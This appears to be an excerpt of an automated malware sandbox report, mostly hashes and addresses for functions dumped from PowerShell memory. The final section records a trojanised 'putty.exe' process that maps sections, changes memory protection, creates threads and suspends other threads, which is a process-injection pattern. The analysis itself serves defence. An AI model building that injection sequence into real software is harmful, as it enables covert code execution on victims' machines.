Instruction ID: 692456d94a9d611e1a104163d070f41eae1b7f8a85070378ffeac6c105770dd3
Opcode Fuzzy Hash: cd96b4976d1f42a07f79b66c53e5b15b56c920c841cd29b975693ace8e6f2b89
Instruction Fuzzy Hash: 3681E77075890A4FE35CEA38941527AB3D3EBCA319B50CABDD05ACB3D5DF36A8428741

Function 00007FFB112B9721 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d93761677dda82a9ba83b27dd04d5f0b0713ad5586f36ee1787e269c44187a
Instruction ID: b6af4af50af1a74366bcbe9d585e557b46c825c5db1d488a515c2a1d3833a0c8
Opcode Fuzzy Hash: c3d93761677dda82a9ba83b27dd04d5f0b0713ad5586f36ee1787e269c44187a
Instruction Fuzzy Hash: 5C71197075890A4FE35CEA3894151BAB3D3EBC9318B51C6BED05BCB2D6DF3A98428341

Function 00007FFB112BCECD Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 222d5b7e76b8c0f4f6c56512d421802232b6b7bfbbb12496a92fa5a985f272e6
Instruction ID: b5602b19daaec41a7c5c68e80119277b1972190c47e6b2bcdcc9e1fb2bc8d2f3
Opcode Fuzzy Hash: 222d5b7e76b8c0f4f6c56512d421802232b6b7bfbbb12496a92fa5a985f272e6
Instruction Fuzzy Hash: A5712D70A1CA4A4FE359EB38D4152B9B7D2EF85324B1486BED04AC72D7DF29A8468341

Function 00007FFB112B86FD Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2746d27ff9ff3c8a7fa96ef068ed2c79c1274197ce1029c72c08a96bf51a8541
Instruction ID: f96ab60c0a022784724eeefad3722c248b7676e8867f46fd1fdeaf72e3ce8517
Opcode Fuzzy Hash: 2746d27ff9ff3c8a7fa96ef068ed2c79c1274197ce1029c72c08a96bf51a8541
Instruction Fuzzy Hash: 8071F770B6890A4FE35CEA38D4152BAB3D3EBC9319B50CABDD05AC7395DF3698428741

Function 00007FFB112B9FD9 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dbb38974e09630485cd9cf49220a2153aa0c0f8ed52c03ba0391a1d6d5af05a
Instruction ID: 294c0318f016d551560733e80702a8bb58a0d952c4e53d2386670b8c26be3ce4
Opcode Fuzzy Hash: 2dbb38974e09630485cd9cf49220a2153aa0c0f8ed52c03ba0391a1d6d5af05a
Instruction Fuzzy Hash: A371C67075890A4FE35CEA38841527AB3D3EBCA319B51CABDD05ACB3D6DE3698428741

Function 00007FFB112B247D Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890f047c8ab9aa3c9495bd35519405c22970f039a863ee624a5d8705edae753f
Instruction ID: 770eeabd9a638ad56a6ebb9fa9593c86ff69157d9e8902bd45c5d242f4db0207
Opcode Fuzzy Hash: 890f047c8ab9aa3c9495bd35519405c22970f039a863ee624a5d8705edae753f
Instruction Fuzzy Hash: D261D57076890A4FE35CEA38941527AB3D3EBCA319B51CABDC05AC73D5DF36A8428741

Function 00007FFB112B212D Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0caf3536838699210102dafbbac38eb9febdadb276ddecb586ef1899191335b
Instruction ID: 891acb5da1686dfb5e4e216e52e9cfffd479440278673e63c6fb5501e954eedb
Opcode Fuzzy Hash: e0caf3536838699210102dafbbac38eb9febdadb276ddecb586ef1899191335b
Instruction Fuzzy Hash: D971B6707589094FE35CEB38841527AB3D3FBCA319B51CABED05ACB296DF3698428741

Function 00007FFB112B8C6D Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558b0adf317d760e460243c269ed7b5022fda5cb863f177cd91130635154092a
Instruction ID: c647dd21a4b5d77411a87531b16cfbe306ab6d2d1c24e01489887859ec9ab8e0
Opcode Fuzzy Hash: 558b0adf317d760e460243c269ed7b5022fda5cb863f177cd91130635154092a
Instruction Fuzzy Hash: 8F711C7075890A4FE35CDA3894152BAB3D3EBCA319B5086BED05BCB3D6DF3598428341

Function 00007FFB112BB078 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c866e97340a205f1c9980d7e357514b8074b547fd46076808d538192e50fef46
Instruction ID: 048f5b1a690b23d24d8382e048993bc7aa67fba24398eec4f85c3931b9292717
Opcode Fuzzy Hash: c866e97340a205f1c9980d7e357514b8074b547fd46076808d538192e50fef46
Instruction Fuzzy Hash: 8561D57075890A4FE35CEA38841527AB3D3EBC9319B50CABDC05ACB3D6DF3698428741

Function 00007FFB112B32A2 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f92ef2fc8ca658d16a48b9831d82da7a5dbb6a870c49b8bb380ceb44c334b43a
Instruction ID: 9468ede663df88972229413d57f957e18dca2c92ea172a4a0ad852c2dc7c17a0
Opcode Fuzzy Hash: f92ef2fc8ca658d16a48b9831d82da7a5dbb6a870c49b8bb380ceb44c334b43a
Instruction Fuzzy Hash: 0E71F97475890A4FE35CEA38841527AB3D3EBCA319B51CABEC05AC73D5DF3698428741

Function 00007FFB112B6552 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30a0c0ea8efc60fe4d1783779d581cad93d9640ea9bcf8c3a8209bfd3115b5d
Instruction ID: 6030a7a3dd6e54633c582d3ff1e0c871f604328b7b8f343b48e33e11e3df2e99
Opcode Fuzzy Hash: c30a0c0ea8efc60fe4d1783779d581cad93d9640ea9bcf8c3a8209bfd3115b5d
Instruction Fuzzy Hash: 64712B7071894A4FE35CDB389415279B3D3EBCA314B5186BED05AC73D6DF3698428341

Function 00007FFB112B9B79 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1fe23d30cd86f8b05dbe2d83937a55b7830fbd2b17e4c3ab12144c641b1ceb
Instruction ID: c641c4e829ae7215ed5bbb1724bf96915b9a3401c7adf610e229efd3a2a29c04
Opcode Fuzzy Hash: 8a1fe23d30cd86f8b05dbe2d83937a55b7830fbd2b17e4c3ab12144c641b1ceb
Instruction Fuzzy Hash: 0D61E97076890A4FE35CDA38841527AB3D3FBC9319B5086BED05ACB3D5DF3698428745

Function 00007FFB112BB8BD Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0a7d11cbe6808ad591af33104f36488906154c9de003038ddf7fa2216d8e01
Instruction ID: 416963f766a185d53b3038ec59df98c5369c810be6a9e6cda1dda3968f269cb5
Opcode Fuzzy Hash: 8b0a7d11cbe6808ad591af33104f36488906154c9de003038ddf7fa2216d8e01
Instruction Fuzzy Hash: 57513A71A1CF450FE365DB3C9855175B7E2EF86324B1586BFD04ACB2D3DE28A8418781

Function 00007FFB112B9182 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff0ca37c34ceddd2984d5be3217f1b10de6a13297094f7de0783182d0cdf8463
Instruction ID: 246e42c9ff76169b921c53be43edadd7eece4b8617063bfc736cd1f013f6afbd
Opcode Fuzzy Hash: ff0ca37c34ceddd2984d5be3217f1b10de6a13297094f7de0783182d0cdf8463
Instruction Fuzzy Hash: 8B610970758A4A4FE35DEB38841527AB3D3EBCA319B5086BDC05AC73D6DF3698428341

Function 00007FFB112BA42D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070c8c7a6f629844e5d9680becca2fc029bf2dcc573e2db2e461a812c7655a9f
Instruction ID: 98d928ba9c2cbeb50a06c66344682a5d6fdc32f1415b9073c7e5f925c4a06b96
Opcode Fuzzy Hash: 070c8c7a6f629844e5d9680becca2fc029bf2dcc573e2db2e461a812c7655a9f
Instruction Fuzzy Hash: 9361147072890A4FE358EB3C941527AB3D3EBC9319B508BBDD05AC72D2DF3A98428741

Function 00007FFB112BB6AD Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218b1c243658abc0d1591ea78b0361ce130d8c7db8204d464f7c180befcfe6e1
Instruction ID: fd2fda317100de7d5602b014feb7e838af969d54bbb38954baecb49950561f2d
Opcode Fuzzy Hash: 218b1c243658abc0d1591ea78b0361ce130d8c7db8204d464f7c180befcfe6e1
Instruction Fuzzy Hash: 0C61C47076890A4FE35CEA38941527AB3D3EBCA319B508ABDD05AC72D6DF3698428741

Function 00007FFB112B6155 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d650400284fbfb880ec58dba4d475ae2b69e655d7244db3fa7b587560e93b05
Instruction ID: 76abd726069588ce8a8f1db02472d685c3e920b81b77198594e13fbbfd3c4e26
Opcode Fuzzy Hash: 5d650400284fbfb880ec58dba4d475ae2b69e655d7244db3fa7b587560e93b05
Instruction Fuzzy Hash: 61513B3075C6494FE358DB38841527AB7D3EBCA318B5586FEC04AC73D2DF2A98428341

Function 00007FFB112B2D99 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b9e2f1962c8d524d682166f9c05c3864b352081cd2ca8246aa6c8aeb8fc05ea
Instruction ID: 3228cece754702aa836599040fbaeca6c969cb6c27e15f1133a6de2e47d8480a
Opcode Fuzzy Hash: 9b9e2f1962c8d524d682166f9c05c3864b352081cd2ca8246aa6c8aeb8fc05ea
Instruction Fuzzy Hash: 1251D9307589094FE35CEA38D41527AB3D3EBCA319B518ABED05AC73D5DF3698428741

Function 00007FFB112B4AF9 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da7da44b1c22fc4302981aba582de5e5b04310c25d765ed3c3598b883c24e6c
Instruction ID: a800b0cb62f7b290512ab8b3700e49edd2436c3682b752db9e49d3b3a0f325d7
Opcode Fuzzy Hash: 8da7da44b1c22fc4302981aba582de5e5b04310c25d765ed3c3598b883c24e6c
Instruction Fuzzy Hash: E151E43076890A4FE358EA38841527AB3D3EBCA319B51CABDD05AC7395DF36D8428741

Function 00007FFB112BA92D Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42fc13acc8e86367df8c6288d28b8f3de90d8c87cded359e956ca4fb5d1288c
Instruction ID: b43334f217ca62a874614b58477acb4ea12392b0e42663396e85d859b79ae305
Opcode Fuzzy Hash: d42fc13acc8e86367df8c6288d28b8f3de90d8c87cded359e956ca4fb5d1288c
Instruction Fuzzy Hash: EB51053075890A4FE358EA38D41527AB3D3EBC9319B10CABEC05AC73D6DF3598428741

Function 00007FFB112B830D Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b20fc5261fcf801fea352fd06edaf422f481d45a8bcf8e1c9064594fe0619ff
Instruction ID: 58dd9cf9a7772433d16223c173f5b0f0d00883cbe03b09a7b15ecb33b52b0f14
Opcode Fuzzy Hash: 6b20fc5261fcf801fea352fd06edaf422f481d45a8bcf8e1c9064594fe0619ff
Instruction Fuzzy Hash: 7E51D77075890A4FE358EA38D4152BAB3D3EBC9318B508ABDD05AC73D5DF36E8428741

Function 00007FFB112B4DAD Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 431aeb52f5601f2d56d5ccd98fee6c5edd1a4d8e90c87feb2b2385f1f08c4e9d
Instruction ID: a2e13c9d96e1ddde51af6d3548d79992a94ff6cadf6a2cc03261918748c02ae7
Opcode Fuzzy Hash: 431aeb52f5601f2d56d5ccd98fee6c5edd1a4d8e90c87feb2b2385f1f08c4e9d
Instruction Fuzzy Hash: FE51F73076890A4FE358EA38D4152BAB3D3EBC9318B518BBDC05ACB7D5DF3694428741

Function 00007FFB112BABAD Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754ca04213c75083d037e4b07f67eb233cc75a808303845b9ddab8593a1dd6ec
Instruction ID: 33818a579b3b5b849079dc47804b10d76a9135746140d3555857ef15bb946a68
Opcode Fuzzy Hash: 754ca04213c75083d037e4b07f67eb233cc75a808303845b9ddab8593a1dd6ec
Instruction Fuzzy Hash: 0C51B87075890A4FE358DB38D41527AB3D3EBC9319B508ABED05AC73D5DF3998428741

Function 00007FFB112B8018 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeeeacf2154a61c5be708b550436cfb2df4ff25ebf4fdb7a5f631db8093c87d4
Instruction ID: c511171e4a474ba59e6679d227420e16886af09c5eccfb414be7de9130213120
Opcode Fuzzy Hash: aeeeacf2154a61c5be708b550436cfb2df4ff25ebf4fdb7a5f631db8093c87d4
Instruction Fuzzy Hash: F451C47076890A4FE358EA3894152BAB3D3FBC9318B508A7ED05AC7395DF3698428741

Function 00007FFB112C3B4D Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48597c5446b2f0c0160c584176970d3fa77aa12ccebb6488ea206f520b2ed50c
Instruction ID: 9fc379007273ee42a769898be77ad3db741e0adf8fc0f0de1fb566299ac8d314
Opcode Fuzzy Hash: 48597c5446b2f0c0160c584176970d3fa77aa12ccebb6488ea206f520b2ed50c
Instruction Fuzzy Hash: 5A51B170718A094FE758EA3CD41527AB3D7EB89318F118ABED05AC73D6DE2A98428741

Function 00007FFB118D8BC6 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1804312691.00007FFB118D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB118D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb118d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4779c8d9baded729bbc6305e330d93f384cb0c30cace890f8619c8f45f011df
Instruction ID: f5379fbada5c755e6e60bb74d72ea1b926501a375f704b4189217ed06f61ec04
Opcode Fuzzy Hash: e4779c8d9baded729bbc6305e330d93f384cb0c30cace890f8619c8f45f011df
Instruction Fuzzy Hash: A541CC91B2CA490BF758B67C981A7BAA6C3DF9D710F5584BEE04EC32C3DD18AC425241

Function 00007FFB112BAE2D Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f8df1b2a465cc694bfdf01797fbb5c344b4c569176a5d2524cca192961c3733
Instruction ID: 374cf32c81f307c06f31d15827487c821a9eb61f48904d71b2fc61d874962db2
Opcode Fuzzy Hash: 3f8df1b2a465cc694bfdf01797fbb5c344b4c569176a5d2524cca192961c3733
Instruction Fuzzy Hash: 0941F67072890A4FE758EA3CD4152BAB3D3EBC9319B5186BDD01AC72D5DF3AA8428741

Function 00007FFB112B5571 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fdcc3cad3a93e1b39a12d6f761d5d34ce58798b30cc9c5b4d88bd9b325adebb
Instruction ID: 7bc8858c948a1713a8a8824c3efd79a0c2b74a3d30baab9e5d76fd9f1fcd8e4e
Opcode Fuzzy Hash: 4fdcc3cad3a93e1b39a12d6f761d5d34ce58798b30cc9c5b4d88bd9b325adebb
Instruction Fuzzy Hash: 27410670768A094FE358EB3CD41527AB3D3EBCA318B1086BED05ACB2D6DF2598428741

Function 00007FFB112B4841 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fdefb3fbbf6ca030a09f2fec04530421c741fa9a50a46e232740691119626be
Instruction ID: df940bb741637e360e52e515e3c834a16abeb50646b5c43b4407512a9f8a47ae
Opcode Fuzzy Hash: 1fdefb3fbbf6ca030a09f2fec04530421c741fa9a50a46e232740691119626be
Instruction Fuzzy Hash: CE41087071894A4FE358EA3CD455276B3D3EBC9318B5086BED05AC73D2DF39A8428741

Function 00007FFB112BA6ED Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc9323cbf715be15354b7ca625b48ff425cb0bc4b79719a7ad37ee8e89f9416
Instruction ID: 2eb458b6fbab41ae109ee0d2078d7c3de793f9fec4604f0881d08da127172640
Opcode Fuzzy Hash: 6dc9323cbf715be15354b7ca625b48ff425cb0bc4b79719a7ad37ee8e89f9416
Instruction Fuzzy Hash: 7241F67076890A4FE358EB38941527AB3D3EBC9319B5086BED05AC7292DE2AD8428745

Function 00007FFB112B2999 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7916175fc254dfe89e2aa2337f5d95bbe59fc1d9d98a1b334c7f0c605b5c550
Instruction ID: 3cae96b2aca727c86090eff0c31963da3d4533702b255c80472b76f92ca63ea6
Opcode Fuzzy Hash: a7916175fc254dfe89e2aa2337f5d95bbe59fc1d9d98a1b334c7f0c605b5c550
Instruction Fuzzy Hash: 42411970718A0A4FE358EA38D41527AB3D3FBCA318B5086BED05AC72D6DF35E8428745

Function 00007FFB112BD12D Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 253077cc7c0c0b860d66e95f98fa05716e2fb20167443e9c4a17f6f78924d6e6
Instruction ID: a91e49f8678fffdc492aa591e345b5702957aaf2ebf9c9daf2790c29078244cd
Opcode Fuzzy Hash: 253077cc7c0c0b860d66e95f98fa05716e2fb20167443e9c4a17f6f78924d6e6
Instruction Fuzzy Hash: 5B41F670728A0A4FE758EA3CD4042BAF3D2FB85328B148BBDD05AC62D5DF29D8424741

Function 00007FFB111507ED Relevance: 5.4, Strings: 4, Instructions: 448COMMON

Download Yara Rule

Strings

;%_I, xrefs: 00007FFB11150BA4
>%_I, xrefs: 00007FFB111508A4
=%_I, xrefs: 00007FFB111509A4
<%_I, xrefs: 00007FFB11150AA4

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID: ;%_I$<%_I$=%_I$>%_I
API String ID: 0-2964354418
Opcode ID: e9aef72eaee7fe0a7cec45dd14ab4d821cb58a1381e71115fa46c8f44194fea3
Instruction ID: 0b166167ce2f64cf9d2abee5654da44f9a1709353e58597f8b064c88789014d4
Opcode Fuzzy Hash: e9aef72eaee7fe0a7cec45dd14ab4d821cb58a1381e71115fa46c8f44194fea3
Instruction Fuzzy Hash: B8E108C3C4EBC25EF39286F89C561A8AF65BF5763475C40FBD0D85A09BF548A81683C2

Analysis Process: putty.exePID: 2568, Parent PID: 6152COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	64.9%
Signature Coverage:	19.7%
Total number of Nodes:	188
Total number of Limit Nodes:	16

Executed Functions

Function 028C164D Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 028C16E6
NtMapViewOfSection.NTDLL(?,00000000), ref: 028C178E
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 028C1B02
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 028C1BB7
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 028C1BD4
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 028C1C77
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 028C1CAA
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 028C1E1B

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
Instruction ID: 73dd9aadbb3e472bf275a5f1f1448c3425ce622e18e1aded7da07c4170099d7b
Opcode Fuzzy Hash: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
Instruction Fuzzy Hash: F5426C79608301AFD724CF28C888B6BB7E9EF88714F24492DF989DB252D770E845CB51

Function 0287125B Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02870DA1,?,00000001,?,81EC8B55,000000FF), ref: 02871299
Thread32First.KERNEL32(00000000,0000001C), ref: 028712C5
Wow64SuspendThread.KERNEL32(00000000), ref: 02871318
CloseHandle.KERNEL32(00000000), ref: 02871342

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
